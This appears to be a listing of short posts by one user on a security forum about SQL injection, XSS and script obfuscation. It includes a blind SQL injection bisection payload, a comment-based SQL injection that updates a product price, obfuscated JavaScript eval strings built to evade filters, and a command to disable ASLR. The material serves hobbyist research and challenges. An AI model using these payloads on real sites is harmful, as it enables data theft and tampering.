sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 9 of 9
2 years ago
tr3w
Yes, you need to turn off ASLR. Try running this as root: # sysctl -w kernel.randomize_va_space=0
Forum: SQL and Code Injection
3 years ago
tr3w
You can get each character through a simple bisection method using a BETWEEN clause: index.php?=IF(SUBSTR(SELECT table_name FROM information_schema.tables LIMIT 1,1),1,1) BETWEEN 0x30 AND 0x45, 60,0)
Forum: SQL and Code Injection
3 years ago
tr3w
Done. It was fun :) FF4 and GC killed a lot of blacklist filters :O
Forum: XSS Info
3 years ago
tr3w
@SW: alert coookie @thornmaker: Sorry. It should be "just by typing into the URL bar". I corrected the discrepancy in the rules. However, I closed the challenge a week ago and I'm no longer updating the leaderboard.
Forum: Obfuscation
3 years ago
tr3w
This started as a curiosity. I wanted to find different ways to run JavaScript with heavily limited character sets. Then, after having so much fun with LightOS's awesome SQLi challenge (http://sla.ckers.org/forum/read.php?24,36040), I decided to turn one of my little experiments into a XSS Challenge :). This way people will have fun attempting to solve it, and I'll be able to learn from your solut
Forum: Obfuscation
4 years ago
tr3w
A dirty little trick to make strings out of unreadable characters: atob(['jm','f67','ipwM','M)','r','t(1+M']['map'](btoa)['join']([])['replace'](/[0A=]/g,[]))
Forum: Obfuscation
4 years ago
tr3w
@.mario oh right, thanks, and dots can also be avoided, heh, maybe it's very impractical eval((<_><_>ale</_><_>rt(1)</_></_>[<>_</>][<>*</>])]())
Forum: Obfuscation
4 years ago
tr3w
String concatenation without quotes and addition signs: eval([<>ale</>,<>rt(1)</>][<>join</>]([])) // only firefox
Forum: Obfuscation
4 years ago
tr3w
Yeah, all their sql injection protections are easily bypassed just with single line comments foo'/**/or 1=1;/**/update/**/productinventory/**/set/**/listprice=101/**/where/**/productname='solarpanel_type2'-- I think some of those /**/ are not necessary but I'm too lazy to test.
Forum: News and Links